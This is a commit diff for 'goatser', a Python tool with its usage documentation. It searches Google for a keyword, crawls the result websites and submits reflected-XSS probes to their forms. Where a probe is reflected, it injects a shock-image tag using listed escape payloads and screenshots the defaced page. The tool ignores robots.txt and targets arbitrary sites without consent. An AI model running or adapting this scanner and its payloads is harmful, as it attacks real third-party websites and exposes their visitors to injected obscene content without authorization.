Commit 4ab90837 authored by Romain Bignon's avatar Romain Bignon

documentation

parent 8dd77b14
......@@ -13,10 +13,22 @@ Architecture
A script named `goatser.py` is run with a keyword to search on Google©, and
goes on each result websites. Then, it tries a trivial XSS `<b>GOATSE</b>`
pattern on each forms.
pattern on each forms. After posting a form, if this pattern is found on
loaded page, the Goatse© photo is tried to be included in, then a parser is
used to find it in the document.
Sometimes, we have to escape the pattern, for example with:
* "/>
* ';"/>--></script>
* </title></head><body>
The bot also walks on links on main page which contain 'search' or 'cherch'.
When we're sure the Goatse© is included in document, a snapshot request is
created as a file in the `queue/` directory. Then, the daemon shotfactory
launches VNC and the browser, goes on website and takes a screenshot.
Depends
-------
* python-mechanize
* python-lxml
thirdparty 'shotfactory':
......@@ -27,5 +39,37 @@ Depends
Setup
-----
There isn't anything to install. Firstly, copy `example.conf` to
`goatser.conf` and edit it.
You firstly have to run shotfactory:
$ ./shotfactory.sh
Use it
------
Then, run goatse:
$ ./goatser.py KEYWORD [START-PAGE [NB]]
Parameters are:
* KEYWORD: this is the key to search on Google©
* START-PAGE: first page to get results on (default=1).
* NB: number of results to analyze.
For example:
$ ./goatser.py goatse 3 200
It is often better to avoid to start on page 1, because first results are
mostly famous websites without so trivial XSS issues.
When a XSS is found, a screenshot is taken by shotfactory and is put in the
`screenshots` directory.
Examples
--------
To see example screenshots gotten with Goatser, go on:
http://people.symlink.me/~rom1/goatse/
......@@ -30,13 +30,6 @@ import lxml.html
from ConfigParser import RawConfigParser, NoOptionError, NoSectionError
class NoHistory(object):
def __init__(self): pass
def add(self, request, response): pass
def back(self, n, _response): pass
def clear(self): pass
def close(self): pass
class Match(object):
def __init__(self):
self.pattern = None
......@@ -75,10 +68,10 @@ class Browser(mechanize.Browser):
FIRST_STR = '<b>GOATSE</b>'
FINAL_STR = '<img src=%s />'
ESCAPES = ['', '"/>', '\';"/>--></script>', '</title></head><body>']
USER_AGENT = 'Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.2.13) Gecko/20101209 Fedora/3.6.13-1.fc13 Firefox/3.6.13'
default_features = copy(mechanize.Browser.default_features)
default_features.remove('_robots')
default_features.remove('_refresh')
USER_AGENT = 'Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.2.13) Gecko/20101209 Fedora/3.6.13-1.fc13 Firefox/3.6.13'
def __init__(self, config):
mechanize.Browser.__init__(self)
......@@ -94,6 +87,7 @@ class Browser(mechanize.Browser):
print 'Go on %s' % args[0]
else:
print 'Submit %s' % args[0].get_full_url()
# set timeout to 10s.
kwargs['timeout'] = 10
return mechanize.Browser.open(self, *args, **kwargs)
......@@ -104,7 +98,7 @@ class Browser(mechanize.Browser):
not 'wikipedia' in url and \
not 'wiktionary' in url
def is_editable_ctrl(self, ctrl):
def is_editable_text_ctrl(self, ctrl):
return ctrl.is_of_kind('text') and not isinstance(ctrl, (ClientForm.PasswordControl,ClientForm.HiddenControl))
def iter_results(self, keyword, page=0, nb=10):
......@@ -119,11 +113,17 @@ class Browser(mechanize.Browser):
return links
def try_website(self, url):
"""
Try to goatse a website from url.
It firstly tries on the main page, then on links containing 'search'
or 'cherch'.
"""
self.try_url(url)
links = []
for link in self.links():
if link.text and ('search' in link.text.lower() or 'recherch' in link.text.lower()) and \
if link.text and ('search' in link.text.lower() or 'cherch' in link.text.lower()) and \
self.is_valid_link(link.url):
links.append(link.absolute_url)
......@@ -131,12 +131,19 @@ class Browser(mechanize.Browser):
self.try_url(link)
def check_form(self, form, pattern, predicate=None):
"""
Try to XSS a form.
It returns a Match object if it is found. The `predicate` parameter
is an optional function which takes a Match object as argument and
which returns True if the XSS is found.
"""
if not predicate:
predicate = lambda x: pattern in x.data
self.form = form
for ctrl in form.controls:
if self.is_editable_ctrl(ctrl):
if self.is_editable_text_ctrl(ctrl):
ctrl.value = pattern
res = self.submit()
......@@ -156,10 +163,15 @@ class Browser(mechanize.Browser):
self.back()
def check_image(self, match):
"""
Predicate for the `check_form` method to find the Goatse® img in
document.
"""
document = lxml.html.parse(match.res)
for img in document.getiterator('img'):
if 'src' in img.attrib and img.attrib['src'] == self.config.img_url:
parent = img.getparent()
# Goatse is viewable only in <body>.
while parent is not None:
if parent.tag == 'body':
return True
......@@ -167,6 +179,12 @@ class Browser(mechanize.Browser):
return False
def snapshot(self, match):
"""
Create a request for snapshot of a matched page.
It saves it in the shotfactory queue directory, and a .PNG will
be created soon in `screenshots/`
"""
domain = urlparse(match.url).netloc
try:
with open(os.path.join(self.config.queuedir, domain), 'w') as f:
......@@ -182,18 +200,24 @@ command %s
print 'Unable to take snapshot: %s' % e
def try_url(self, url):
"""
Try to goatse an URL.
"""
# avoid to test several times the same UR.
if url in self.tested:
return
self.tested.add(url)
self.open(url)
# try each form.
for form in self.forms():
rightright = False
if form.method.lower() != 'get':
continue
for ctrl in form.controls:
if self.is_editable_ctrl(ctrl):
if self.is_editable_text_ctrl(ctrl):
rightright = True
break
......@@ -202,9 +226,12 @@ command %s
match = self.check_form(form, self.FIRST_STR)
if match:
print 'FOUNDING..'
# The trivial pattern is found in the resulted page. Now let's
# try a Goatse and find it in parsed document.
print 'FINDING..'
match = None
i = 0
# Try several kinds of escape.
while match is None and i < len(self.ESCAPES):
match = self.check_form(form, self.ESCAPES[i] + self.FINAL_STR, self.check_image)
if match:
......@@ -235,7 +262,7 @@ if __name__ == '__main__':
try:
b.try_website(url)
except KeyboardInterrupt:
print '^C'
print ''
except Exception, e:
try:
print 'Error: %s' % e
......
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment